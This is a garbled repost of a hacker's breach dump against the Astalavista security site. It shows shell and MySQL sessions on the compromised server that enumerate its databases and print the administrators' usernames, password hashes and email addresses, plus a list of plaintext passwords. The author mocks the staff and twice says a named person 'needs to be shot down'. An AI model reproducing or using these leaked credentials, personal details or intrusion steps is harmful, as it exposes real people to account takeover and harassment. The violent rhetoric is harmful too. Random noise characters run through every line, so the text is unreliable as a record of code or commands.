<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>1 w/ @* c1 V8 s6 G; L1 @
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
$ g/ ?9 |( X4 ?3 l <generator>Astalavista.com</generator># D8 U' N* n( g$ d% o" Y
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘- \7 ]' B o N5 E4 V# d* l! ]
</channel>, C M4 J+ p3 @! |: P7 I
</rss>’;
. K, |0 a9 R- E* X: w; g' k$ Q
$ H+ r4 _9 v) m4 b3 f if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) { {0 E% a8 w# b. n; L* L
unlink (FULLPATH . ‘/feed/exploits.xml’);
% D1 |, K }: ?& r8 ]/ T2 _4 m }
K5 U) a; ?' k1 u( W. C' ?6 b8 v% s1 R3 t
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
6 G' `9 i. O1 ]/ a. d[snip]7 J ? D& G& L0 D9 m) H$ d, d! f
" y ^8 r D {$ \3 psh-3.2$ cat exploits.sh
( @7 z L3 c. o& ?#!/bin/sh# C9 t }3 [* B1 ]% S$ t; X8 o
3 h8 p! B- [) w
###########################################################: L! B7 f; n; i
# #
6 J f7 r# z+ Z3 O% [, s! O# Title: milw0rm exploits adder #
$ `& y; K8 e T4 B7 y. |# Description: Add all milw0rm exploits to the #
, i) N! H( R0 j ~+ d' \) S y# Astalavista.com database #
( ]2 i6 O: ^- ~) W2 M# #; N7 H8 H [- u8 s1 r$ ^
# Company: Astalavista Group #% \+ v8 B5 D3 w
# Author: Paulo M. Santos #
# y) o$ R, O, n3 S5 \4 D7 Q# E-Mail: 链接标记paulo.santos@astalavista.ch #
+ u8 l# ~* L# j# #
+ ?! b" |) r& D7 c4 }7 F###########################################################
2 K3 ]" D2 L8 H. t; V
* J9 e& ~4 h$ F+ S# path$ G$ I& _1 T+ j& Q0 {
this_path=/home/com/public_html/modifications/cronjobs
) A( }% x8 A% [' g" O) h+ ^* U1 h3 V0 j' `4 V
# change directory& p0 I6 s# x" W/ \$ R: a
cd $this_path$ r$ Z) l2 c7 p2 X
cd tmp/8 N6 t) J2 E1 G5 f
3 u9 a( S8 o3 C. a x5 V
# delete files! O$ }8 ?3 l7 a8 R6 K; `' |
rm -rf milw0rm.tar.* &
3 p& a1 O1 m" k1 z q. Y/ T& R- s" `rm -rf milw0rm/ &
& [0 j: M2 |6 ?3 J
" d, n6 }8 Q& D; Q* T: |7 B4 b# wget milw0rm paket6 T g7 f7 r9 {2 e& H( X
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
( G/ X% ?; t8 b/ w
( [* z9 U& j0 O# extract milw0rm paket
1 h! I/ e# g# Y; S2 q: u9 } q, Ntar -xvf milw0rm.tar.bz2
6 B! f' u- i% t2 r2 U& F
8 x0 b7 f# f _$ ], ~' m# change owner+ p$ m1 o& e" X+ ]9 a
chown -R com .
0 i1 r: ?. \% cchgrp -R com .! D4 q% d/ i+ M) y" i
1 t" _7 Z* N3 p S
# execute php script
$ | Q p$ k5 _( |cd $this_path
* h( l7 `/ W8 Q* R/ Iphp -q exploits.php0 ?* D7 ~& w' d( j% W+ J: G8 C1 ]8 ^
( w- G4 l4 ?. w) p9 ]
# delete files
7 l0 c% V' e% |3 ~& X- S4 irm -rf tmp/milw0rm.tar.*6 R$ o) M1 V( \1 x0 p w
rm -rf tmp/milw0rm/, Q. @& G6 a b
# G- k, G+ m+ p' y" @0 J' V
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
, C$ F8 u7 K8 ?, aPaulo M. Santos needs to be shot down. g5 N, N2 k7 l9 M" _6 G
- M! T7 q$ h4 a" X+ K0 Emysql -u contrexxuser2 -p$ f5 C* b* w; N9 J
Enter password:* I( c( h4 [2 ?! A; y; Z
Welcome to the MySQL monitor. Commands end with ; or \g.: J+ C( _( O) r$ ]3 h- S8 D
Your MySQL connection id is 261694, T' O5 Z. s" O0 a- e6 w- J
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: }* T( i7 s3 v; M1 _# L
; s" Q X Y8 L5 y" ]6 m3 TType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ H r7 K) ~/ \- ~* o, i% R: G5 a& v0 f; h
mysql> show databases;9 K+ `6 a+ E$ |9 f1 \
+——————–+) @' Z: I1 d! _" V
| Database |
( ]4 W; M5 ]- _0 z3 z+——————–+8 V% ^$ w7 w5 x
| information_schema |3 e/ }. @- ]3 h8 W
| com_contrexx2 |
) U0 ] W+ c0 u7 _| com_contrexx2_live | h9 |8 D, P8 }
| test |% f" B: J: q8 e5 \, w$ K4 W6 e
+——————–+0 @. N( P3 i/ C' V) A
4 rows in set (0.00 sec)3 X0 Q& a+ f& F8 i; _* \
& ^1 o/ H6 y$ [- I3 ?% l9 J% h- imysql> use com_contrexx2_live
- n) I& w* S3 I8 X- s5 _: U" SDatabase changed, |7 i9 K5 `7 j5 {4 }
mysql> show tables;
9 R1 G( M8 U7 e0 O( C& S! S$ q, p) m+————————————————–+6 y7 }3 G6 _% r1 I) h: M
| Tables_in_com_contrexx2_live |- c q; N8 G" G
+————————————————–+
# ?/ n" k) T2 T3 S1 ~& d| cc_banner_counter |0 d) @. B) N4 G: s
| cc_search_counter |
. G( w* i2 Q) U4 n9 V| contrexx_access_group_dynamic_ids |4 T& ?8 p1 @8 ]* ~6 G, f; @
| contrexx_access_group_static_ids |
+ d$ J2 Y2 t1 \- N* Q| contrexx_access_rel_user_group |
% ?& j. S8 A7 X0 m| contrexx_access_settings |6 o N2 q+ @0 \% U6 K' }; m4 k4 U+ f
| contrexx_access_user_attribute |. n0 | ?$ v4 n6 I0 n1 F! n
| contrexx_access_user_attribute_name |
* w9 x4 I. J) p- i0 n+ n2 o2 F| contrexx_access_user_attribute_value |1 S3 c+ z4 z$ }7 I& `- b7 _
| contrexx_access_user_core_attribute |: X" ^5 D/ k1 `8 m0 |' _2 x
| contrexx_access_user_groups |
1 G6 r+ E- K8 ] U* X| contrexx_access_user_mail |
$ C* K( Q3 p# u2 M+ X6 V| contrexx_access_user_profile |
% b9 [2 p- N! C& g2 l, @4 v) n| contrexx_access_user_title |& l8 ~! K6 @$ C1 u* `, E* C
| contrexx_access_user_validity |
4 C: q, ^, V e* O4 P! ]8 u1 ^& b| contrexx_access_users | ]- T( l$ t& s/ u. z/ o8 M
| contrexx_backend_areas |
% g+ A% @& V7 K. S- t6 ^% C2 B! F$ t| contrexx_backups |. V( I, t# j* _& {
| contrexx_content |0 L( g7 C1 W' d. P, M
| contrexx_content_history |
+ g8 V& N, r) N% q Z# ]# L| contrexx_content_logfile |7 s6 m2 ^" B2 H" B5 b/ |; y
| contrexx_content_navigation |
3 t; r( ]. p: W' F7 H$ V& ?& F: u| contrexx_content_navigation_history |* d8 E2 c& V+ A2 W1 G6 o X
| contrexx_ids |! s) S r3 F( v. d4 ? G
| contrexx_languages |0 Z+ E, N0 _0 c
| contrexx_lib_country |
, u8 W: k; L, a0 f2 K1 h6 K| contrexx_log |2 y1 h% { b8 ]9 `% p
| contrexx_module_alias_source |% f Q2 ~. Q8 _" T$ Z1 o* @3 ]
| contrexx_module_alias_target |, ~* s' r# E& n5 ^" z# F6 k. V
| contrexx_module_block_blocks |$ m+ n- x" @! e+ e J4 A: |5 F: ~
| contrexx_module_block_rel_lang |; s6 {2 X* _! @+ D; ~4 g Y
| contrexx_module_block_rel_pages |
9 k1 {- y4 Q/ y| contrexx_module_block_settings |
% q3 R' E* ^ R1 P| contrexx_module_blog_categories |1 i) B7 O8 L5 J$ b$ h+ r+ a: m/ p
| contrexx_module_blog_comments |+ A, }! [) W8 k0 B5 h# R
| contrexx_module_blog_message_to_category |/ {0 C' S2 g( M3 B. M
| contrexx_module_blog_messages |
C* {$ z j0 A| contrexx_module_blog_messages_lang |
6 T) k% \# k' n. U: g" Y| contrexx_module_blog_networks |
5 ]6 I, B9 D; T; \7 w; ]| contrexx_module_blog_networks_lang |
' I0 v& k" w A0 e0 R5 q1 _" A& w| contrexx_module_blog_settings |5 e+ n" z! m# p: c% o+ V: V5 Y
| contrexx_module_blog_votes |% E8 B) y. U( v B
| contrexx_module_calendar |8 f! T, h i/ [& B* z/ g( k
| contrexx_module_calendar_access |
9 A9 {; ~) _/ S' ?3 v" X| contrexx_module_calendar_categories | i6 |2 n( O- r$ B" C- S! \
| contrexx_module_calendar_form_data |4 v8 d5 R5 S- i0 y! x0 e; p% |
| contrexx_module_calendar_form_fields |
( `: @8 m' {6 ~. y" W| contrexx_module_calendar_registrations |
3 F# r. K" @( Z, ]| contrexx_module_calendar_settings |
9 n' R9 U& {* `9 [! N x" E7 D| contrexx_module_calendar_style |
4 W5 c2 s, q( Z- _" F3 A| contrexx_module_contact_form |4 q; J7 V" u& ?" F4 e
| contrexx_module_contact_form_data |
/ V; O2 d. e) D9 ^# K4 {| contrexx_module_contact_form_field |
% J4 k1 z9 C4 N- g! L| contrexx_module_contact_settings |" @0 Z8 L9 c( @& l' E$ X& A
| contrexx_module_data_categories |
n$ v4 B3 [* `; s# J2 t| contrexx_module_data_message_to_category |
* N! }. J7 |* ]| contrexx_module_data_messages |# U) I& j* _5 J% \" G4 a
| contrexx_module_data_messages_lang |3 h9 I! A: M1 L4 e+ ^3 b2 T
| contrexx_module_data_placeholders |
$ M Z" }* `) T b| contrexx_module_data_settings |7 c e+ D1 V* P4 R# K
| contrexx_module_directory_access |" @* Z4 a, p% W. ^8 q6 m) L% [
| contrexx_module_directory_categories |
2 x e2 `. | @' E| contrexx_module_directory_dir |
& V5 ^ u3 ^7 n$ c8 g| contrexx_module_directory_inputfields |5 P1 @2 J' C: s% O4 l) ]/ j
| contrexx_module_directory_levels |9 ?& [3 s: G/ u `
| contrexx_module_directory_mail |# S4 V9 Z7 C( i+ q) T7 k
| contrexx_module_directory_rel_dir_cat |: Y7 _& H" l/ N; ?3 I
| contrexx_module_directory_rel_dir_level |
! T1 \* d) Y# S( ?| contrexx_module_directory_settings |$ {- Z/ @1 e& {. Q" v5 o1 g4 a
| contrexx_module_directory_settings_google |9 O/ c' S5 D. U `
| contrexx_module_directory_vote |9 H6 R" g0 c. a( Q1 p# `
| contrexx_module_docsys |
+ I' r+ k! Z+ n6 V| contrexx_module_docsys_categories |
$ `; [$ r$ J% g0 E1 D| contrexx_module_egov_configuration |; Y" I9 m/ E6 V% @, C/ m T
| contrexx_module_egov_orders |
$ R( {9 c% m7 P$ w| contrexx_module_egov_product_calendar |0 Z! r: H7 h) n5 C. Z# y6 F
| contrexx_module_egov_product_fields |5 L Z# Q( R0 D% Q1 y
| contrexx_module_egov_products |4 T9 W$ ?( G6 N- y7 \4 n; q
| contrexx_module_egov_settings |! [; C# `, F5 m, t6 F
| contrexx_module_exploits |' w4 G+ S, v3 j! ^0 C q
| contrexx_module_exploits_categories |
; m) g2 A8 Z( H4 K3 g' z| contrexx_module_feed_category |4 n* t8 c! L" ^. k. x; W
| contrexx_module_feed_news |: j9 }: n- N S4 e( M
| contrexx_module_feed_newsml_association | B$ ^9 o4 V; P: [5 S
| contrexx_module_feed_newsml_categories |
9 H+ a7 b: Z2 |( C! ~' ~| contrexx_module_feed_newsml_documents |7 T- N9 r" R9 H. R2 D- C% V
| contrexx_module_feed_newsml_providers |- i* N+ s# V) ]
| contrexx_module_forum_access |
* l1 ~ e+ C4 k& |7 y8 A! n8 J2 l" R| contrexx_module_forum_categories |
# J8 w k- W: C8 T1 I( m$ v| contrexx_module_forum_categories_lang |$ a6 Y! o* O* Y% b! @8 V! U- U. Q7 }
| contrexx_module_forum_notification |
4 P/ s7 U, k3 R; D0 o) O| contrexx_module_forum_postings |
) H+ Y# y f7 I1 [% G6 l| contrexx_module_forum_rating |
3 z* W% @* P, p' ]7 T4 `, m0 p% _| contrexx_module_forum_settings |
( S% f) o- }8 k, m B% }! w| contrexx_module_forum_statistics |
" E: r, \$ H d8 O| contrexx_module_gallery_categories |
( D; d2 O! b. ~| contrexx_module_gallery_comments |( K/ `5 F7 d' g
| contrexx_module_gallery_language |
. h- E# s, r2 ~2 n| contrexx_module_gallery_language_pics |) a$ a, P" r4 F R
| contrexx_module_gallery_pictures |. k, K8 |/ j3 Q, e& x( R( B
| contrexx_module_gallery_settings |$ O1 }2 `' D/ J! |# |
| contrexx_module_gallery_votes |
! T$ @% \3 o0 ]% L| contrexx_module_guestbook |
: y, h" C- m2 _& L| contrexx_module_guestbook_settings |/ d. m2 c0 B/ [8 Q
| contrexx_module_livecam |
3 Z9 H7 G, l4 a q| contrexx_module_livecam_settings |
) R: n' I7 }8 w2 }! B: O% Q| contrexx_module_market |# f8 D/ c* y# C9 Y: Y) a
| contrexx_module_market_access |- `' Y, y2 Z5 Z+ m% \$ h7 @ K
| contrexx_module_market_categories |- `( M( \" V' X) a- s8 [; S
| contrexx_module_market_mail |
9 \5 o6 S9 c7 r: Z A| contrexx_module_market_paypal |& g' ? h- w6 S. ]6 `* Q/ n6 ~' ~8 o
| contrexx_module_market_settings |0 h- T- k& A) a
| contrexx_module_market_spez_fields |$ R( c1 s3 ?+ k, Q$ B M7 D
| contrexx_module_mediadir_access |
/ V2 h q- c% ?| contrexx_module_mediadir_categories |
; m# P! q$ f- b) d7 Y* [| contrexx_module_mediadir_comments |4 D2 }2 L9 o0 T" u+ @& }: f- H0 l) L" _4 @
| contrexx_module_mediadir_dir |
1 g6 ^- l# @# Q4 s1 V9 O9 \. u/ s% P| contrexx_module_mediadir_inputfields |- w! m! c* |) A8 f
| contrexx_module_mediadir_levels |2 U5 m& n; s# Y; i# L0 X
| contrexx_module_mediadir_mail |) v# N! G2 n( L8 w
| contrexx_module_mediadir_rel_dir_cat |! A* b$ o7 s6 z( W
| contrexx_module_mediadir_rel_dir_level |1 |% L/ Q( R/ f$ d8 H9 W6 E
| contrexx_module_mediadir_reports |
: a0 r$ m0 g8 j% l5 }: K% A| contrexx_module_mediadir_settings |
: o; ]2 j% ~# ^| contrexx_module_mediadir_settings_google |
2 i/ S) S A4 n! M( i| contrexx_module_mediadir_vote |5 Y j: z# r) Z6 a) X
| contrexx_module_memberdir_directories |
# B$ w1 D; l) w+ Y# l- d| contrexx_module_memberdir_name |4 h2 z1 x6 z/ S: D( m! P3 }
| contrexx_module_memberdir_settings |& x/ m! |4 }1 z/ K/ l3 H7 t6 \
| contrexx_module_memberdir_values |# f# B2 Y7 D" T# j$ e
| contrexx_module_nettools_allowed_groups |
/ I6 {/ L/ w N& q( Z1 I, O1 `8 H| contrexx_module_nettools_settings |
o% p# p0 i" S+ ]" p1 w2 B| contrexx_module_news |
# r; d0 r9 S& Y! b1 F7 Y4 a9 G| contrexx_module_news_access |7 y+ r: T$ ?6 c$ v4 |! y
| contrexx_module_news_categories |, l+ `- S- l% M3 @/ g, E
| contrexx_module_news_settings |
* Q1 M2 X0 h/ o# l| contrexx_module_news_teaser_frame |
! n$ Z0 Z" a' H( I' t| contrexx_module_news_teaser_frame_templates |
# r' I* p3 f5 w| contrexx_module_news_ticker |
& ^! e4 @) O( ^7 ^| contrexx_module_newsletter |& S# [ E2 b/ |. E% }
| contrexx_module_newsletter_attachment |
3 M& S9 k1 m$ Z7 |- e8 o; {| contrexx_module_newsletter_category |
5 ~- D4 H' E! G3 i. a) f| contrexx_module_newsletter_confirm_mail |
! A7 p4 ?+ M5 c* c4 t/ c. Q8 N| contrexx_module_newsletter_rel_cat_news |
2 x# ]! x+ Q: I$ G: J' ]% }2 k3 _| contrexx_module_newsletter_rel_user_cat |
2 o' n( H/ K& g2 I5 W+ O| contrexx_module_newsletter_settings |8 D. B6 W1 g2 h% c3 G+ |1 J$ ^" e0 ]
| contrexx_module_newsletter_template |
{/ k2 \% [! D2 D3 || contrexx_module_newsletter_tmp_sending |! [7 [0 ~: h7 f) {5 Z7 e7 H9 ?2 B
| contrexx_module_newsletter_user |
- s, O( p2 `# B z! F8 ?& B| contrexx_module_newsletter_user_title |
1 e% _: ~5 X7 P& z0 H, e| contrexx_module_onlinetools_defaultports |9 a8 N8 B! Y, e( J9 U( U( H" ^
| contrexx_module_onlinetools_defaultports_back |
5 k1 C6 G- o) T. I5 q| contrexx_module_onlinetools_geolitecity_blocks |
# R' L4 P3 F" d| contrexx_module_onlinetools_geolitecity_country |- T6 u3 |5 R+ ^3 I2 T+ y5 O
| contrexx_module_onlinetools_geolitecity_location |$ n' g5 l2 \! r
| contrexx_module_podcast_category |
3 T8 R4 R. X/ h+ l m; u7 {# l" n| contrexx_module_podcast_medium |
' X: T6 Z) \7 k% a# W, T" K5 {| contrexx_module_podcast_rel_category_lang |
7 o3 q X: s) `9 [| contrexx_module_podcast_rel_medium_category |
! E C; t. \) D# N" L! @| contrexx_module_podcast_settings |
2 S& v3 L4 Y9 q3 }| contrexx_module_podcast_template |
# u' J2 D M% E8 G( h' z| contrexx_module_proxydb |
0 M1 c3 m& o& W. q| contrexx_module_recommend |
: m/ f! I( W4 L% N- b/ ?0 A, x| contrexx_module_repository |/ T' M# V4 l& v/ P
| contrexx_module_securitynews_cats |
% m: a$ U" w D! B| contrexx_module_securitynews_feeds |8 _* o6 f5 @" }* T* W0 v; a' ]& s
| contrexx_module_securitynews_news |! a4 {% ?5 f1 d1 W! {& U% I6 O
| contrexx_module_shop_categories |1 y1 n1 g: [- i$ A, y
| contrexx_module_shop_config |' A" V# k, v1 {+ h
| contrexx_module_shop_countries |
" [( l8 l- V- j! _5 K: k1 \% t| contrexx_module_shop_currencies |
4 ^( P% u1 t e| contrexx_module_shop_customers |& z$ E( j, u7 l# |2 O6 t, R3 A
| contrexx_module_shop_importimg |
, d6 [5 F" H3 R, T6 F3 }| contrexx_module_shop_lsv |
' }, f( U1 F: c| contrexx_module_shop_mail |
* I( {* }3 g. Y| contrexx_module_shop_mail_content |
5 r6 L# t5 z; Y* @/ h2 T$ N" M' `| contrexx_module_shop_manufacturer |1 s& G ^. J2 {' F+ I; x2 m
| contrexx_module_shop_order_items |; }* u1 _% u( x' Y
| contrexx_module_shop_order_items_attributes |+ B: S8 w& U, X" V3 B
| contrexx_module_shop_orders |) _( j) M; N( Z; `$ l+ E; W
| contrexx_module_shop_payment |* _0 G& n& @ {; B
| contrexx_module_shop_payment_processors |+ p/ m7 e P7 j, D9 t8 r5 J
| contrexx_module_shop_pricelists |
3 H, ]/ h1 Y1 g7 M6 n| contrexx_module_shop_products |
, o; m; p+ ]1 V2 s. e) [" _| contrexx_module_shop_products_attributes |5 i; h- e. Q; \' H
| contrexx_module_shop_products_attributes_name |
* W4 t9 n% p3 x2 N| contrexx_module_shop_products_attributes_value |4 f) S6 H0 z, M2 ~; g l* L1 m
| contrexx_module_shop_products_downloads |0 S, p9 a8 T, s6 @' a2 d0 p
| contrexx_module_shop_rel_countries |; M( ]) }3 B X0 H, d
| contrexx_module_shop_rel_payment |
7 z4 r' }0 X6 V. T( S| contrexx_module_shop_rel_shipment |
. N7 \; c$ E) r$ n" e2 R| contrexx_module_shop_shipment_cost |, i4 v1 ^( m! ^ \/ C
| contrexx_module_shop_shipper | y# ?0 |1 z7 V8 L/ \# g
| contrexx_module_shop_vat |
Q- ]) t0 v7 G1 P+ ^2 r' Z( Z6 @| contrexx_module_shop_zones |% ~* A9 i" [8 S- K" G
| contrexx_module_u2u_address_list |
4 s( B) F) n, I9 b; M| contrexx_module_u2u_message_log |2 U% s& F3 W, p! U2 E( x4 d
| contrexx_module_u2u_sent_messages |6 i2 [3 { H; z% x5 D, D2 h
| contrexx_module_u2u_settings |* |* b; P, J$ J9 D
| contrexx_module_u2u_user_log |
4 t$ N0 N/ ~3 \: x9 c o2 r6 F. b| contrexx_modules |" Q! e) b# O: G7 g+ x7 h
| contrexx_sessions |0 h7 K" B; p. n+ s( H, _1 y6 f
| contrexx_settings |
; m# e- _) t! || contrexx_settings_smtp |6 L) H: E. o: ^- Q
| contrexx_skins |! I4 ]( j! Q: N( T& g7 Z
| contrexx_stats_browser |
7 p' x& _, }0 w) H# f' O2 {5 Y| contrexx_stats_colourdepth |
2 s- B9 z \6 J% y& U5 d| contrexx_stats_config |
8 p8 J5 o; J4 P| contrexx_stats_country |
; i* z: ^) ^$ r" j| contrexx_stats_hostname |
( k. ]3 i- Y" t+ M| contrexx_stats_javascript |* P( n6 J8 O( {; W5 A
| contrexx_stats_operatingsystem |
0 x) _/ b) @' m- ?& N| contrexx_stats_referer |; B; a0 d8 x0 s1 Z. z8 W# Y
| contrexx_stats_requests |
% `2 B! H' s' G3 i4 k# T( Q| contrexx_stats_requests_summary |
) @/ d! q* Q9 M- V- e+ d$ _# L| contrexx_stats_screenresolution |- K" G8 w/ Z! N1 {! a4 b
| contrexx_stats_search |
- L8 m5 t( d9 V, |( `7 H6 Q| contrexx_stats_spiders |
, \! V6 N. I* j) T$ h| contrexx_stats_spiders_summary |, B, g8 u! r! l4 O- M
| contrexx_stats_visitors |1 Z t) G. Z) x4 _
| contrexx_stats_visitors_summary |; l7 d4 l1 ~3 b6 I
| contrexx_voting_additionaldata |
) S8 g$ q# h- H$ K. W| contrexx_voting_email |! q" ^2 d. `( |' D
| contrexx_voting_rel_email_system |
$ I$ I# [& i+ }8 Q| contrexx_voting_results |
5 t) H; L2 S- P. y| contrexx_voting_system |5 ]( `0 T2 l5 r" M% _
| foo |* G5 A+ {+ b+ a: w( ]
+————————————————–+
A" |' V8 j# o3 J& a227 rows in set (0.01 sec) |4 e+ J+ v1 Z6 X+ ?; \
8 U, F/ q8 `9 Z
mysql> select count(*) as skids from contrexx_access_users;" u9 d2 F T; l7 \
+——-+
* c9 h, w {: q' Z; Q" V7 i8 L| skids |9 @% S8 q& {+ y4 Z9 t7 C
+——-+( n: \% E7 B/ S9 n+ v- t3 Q* X
| 53699 |9 X! l) l; H( I7 N9 E6 ~
+——-+
! {7 ~, c# j8 S/ P; ~7 R; u1 a1 row in set (0.00 sec)
. T- ?- @5 c2 K( L: s7 Z0 s; R6 a! d$ M F
mysql> describe contrexx_access_users;- p+ ]0 O) O" m0 J
+——————+——————————————+——+—–+————–+—————-+
; ~0 `5 O2 Y, [, d| Field | Type | Null | Key | Default | Extra |
8 `9 |7 j0 a. b" L+——————+——————————————+——+—–+————–+—————-+6 @% |$ o0 u5 o( S! f/ V
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" e8 |2 g' K; j1 F9 `| is_admin | tinyint(1) unsigned | NO | | 0 | |
6 X: X/ i+ ?+ x1 T% f% C| username | varchar(40) | YES | MUL | NULL | |5 y$ [4 X' T7 L8 K' T
| password | varchar(32) | YES | | NULL | |' ^/ m) i# V) J7 k
| regdate | int(14) unsigned | NO | | 0 | | Z& x+ @) @: P7 v2 E# M
| expiration | int(14) unsigned | NO | | 0 | |
/ R6 X* ?( a7 |* X; L' a; Z| validity | int(10) unsigned | NO | | 0 | |) `8 D; G, o( l! j5 K, ?: | r0 v' r
| last_auth | int(14) unsigned | NO | | 0 | |
3 N( w6 Q0 a3 V| last_activity | int(14) unsigned | NO | | 0 | |
" I# O" r" h2 {! s7 Q| email | varchar(255) | YES | | NULL | |: R4 t3 U4 X- p( a3 ?9 n a# i- ~
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |3 p% W- O; g6 z0 i% `( `
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
; u8 r) D# H0 E7 H" _6 F$ m| backend_lang_id | int(2) unsigned | NO | | 0 | |$ ^, h) ~. E& g5 u% Q; h' P3 J6 p
| active | tinyint(1) | NO | | 0 | |/ `: M8 ~0 P; C5 p" ~0 W$ ]
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
# z- J- w0 ~2 Z6 ~: C# v| restore_key | varchar(32) | NO | | | |7 L( U$ }2 ~' c
| restore_key_time | int(14) unsigned | NO | | 0 | |: h" {1 p# c* N3 U" x
| u2u_active | enum(’0′,’1′) | NO | | 1 | |9 L; s2 c0 n8 r" n
+——————+——————————————+——+—–+————–+—————-+
: g% h3 t# a7 }" s! o18 rows in set (0.00 sec). T. x$ q1 ]) Z0 ?, ?% [" Q
5 b1 J7 ~0 \. V# r2 t6 ~9 F
mysql> select username,password,email from contrexx_access_users where is_admin = 1;9 o8 y- y! I2 [! f ?) u2 [) B
+————+———————————-+—————————–+
& x8 `; j) E' P# @* J3 h| username | password | email |, e9 I3 s, [" D" ~; C) _
+————+———————————-+—————————–+2 }) ~1 U; v) q% |0 U; Q
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
$ O. ^& f' Q4 m' Q| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |& j+ P& F" C9 P% Y' j, P6 x
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
) ]/ m) {( L6 b' e* ^$ O* j| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |( v9 z* k* E+ N/ p
+————+———————————-+—————————–+
- W" x. Y- g0 T6 k5 y8 ]4 rows in set (0.04 sec)& F0 ?" k/ k+ `# {0 F
) e; Q( s5 V2 C: p" I3 o8 j$ Q+ z
mysql> exit;- F( \* J. X ]: q" F
Bye
+ l+ @- h8 O. B, N2 P! g T7 T5 E1 D( `. Q4 ^
[~] There you go, your “team of security and IT professionals” is a joke.
* Q5 A& T1 g% e2 a( h) \$ x; M) Z2 n7 o; N$ |; }) e6 A( g
+——————————+) ^% c9 n& o+ s2 \2 e
system:f82BN3+_*
/ H1 T! i7 F: q2 C" p1 ]7 t' JBe1er0ph0r:belerophor4astacom
8 C# v; g: K- P/ r( x. O0 e( sprozac:asta4cms!
, Z/ ^ g$ V: h3 s/ h; h: fcommander:mpbdaagf6m/ n5 A+ w& O: S9 {4 K
sykadul:ak29eral
( ]% ?% P5 n5 Z+——————————+* b6 N/ C& o4 L0 f3 O& n1 Z3 E! u
" z: v! @/ K% j% R% I+ n$ R
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
7 ^. j5 Y+ F) u: I…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.; H4 o, O2 ^; x. H
8 }" M0 M0 ^) X$ l% G" g[~] Lets move to astalavista.net now,
0 I4 q6 p0 {* Q. h; n$ E$ ]) a: n+ ?% M
From <链接标记[url]https://www.astalavista.net/[/url]>:
5 u! h0 l" @. h7 A! Q( f>> Everyone knows that the best defense is a good offense.8 o9 {3 O# {+ F3 o* P8 U
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.& O+ M# o0 G. T! @% k
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.( e d) Z5 c$ j' h) i) e
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.” M1 Q7 X: N4 h% K- r" p% M* h
# K( W9 B+ }, m>> Go ahead, try and hack our server . in a completely legal way!
5 k4 y% r, }! G6 E; ^' R$ c# M# v>> Learn by doing: We offer our members tricky tasks and challenges on an( @" Z2 J' K3 D S3 f
>> ongoing basis so you can test your knowledge and abilities. You can also% m2 O% B; {- a0 n+ ^7 A; b3 _
>> demonstrate what you.ve mastered by taking part in regular hacker contests: b" x% E# q8 s0 k3 F: _/ h
>> and war games
* \( V) K J0 z7 ?3 j) s( N* L0 h+ V7 @
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!' g& P6 B4 S0 N
6 B7 G2 @( |: P6 i[-] Tricky task: Find home dir of astalavista.net9 @/ l8 {( p1 s9 P7 B6 f
/ t7 _! B8 T* E. D1 r9 e# ?sh-3.2$ ls -la ~astanet* x1 K8 i/ v" D
total 48
$ W+ k; \; W- h# vdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .4 X" `- l) {( P& Q; x: a$ E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ m! j% @( s. S, C$ Z+ X9 K
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 r, O, C4 r* d! l- y: g3 S
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
2 ]. Q$ d2 s& y4 }; k( m: p+ p5 a \-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
7 q3 A* U& F% X7 ?! [0 @" y8 y3 h9 a7 T( P7 G-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile# G7 k) D# ]5 g% @+ _1 \6 W+ W. W
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
- @! B% ^* v" F$ Zdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
8 y3 }7 S# g( L: V7 L# N/ jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
E5 ?2 ~" F; B% h" T' U. ~. m0 fdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
$ o6 l6 q( ?5 Wlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html5 a) r0 Z& h. c' a- z9 ~
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
4 c* x) Y" l* @8 ?' i/ h6 G+ A
9 V& s$ X4 B9 b2 Vsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
; v U8 Y4 c& f5 gsh-3.2$ ls -la5 E0 E& k( C8 D9 E" d
total 200
' B. a, o) j3 f7 a8 edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .! t) {" B' k5 f$ g. B! R
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
2 b G& R& ]* K3 X. I& b# Edrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
, J0 E" }, T: }drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
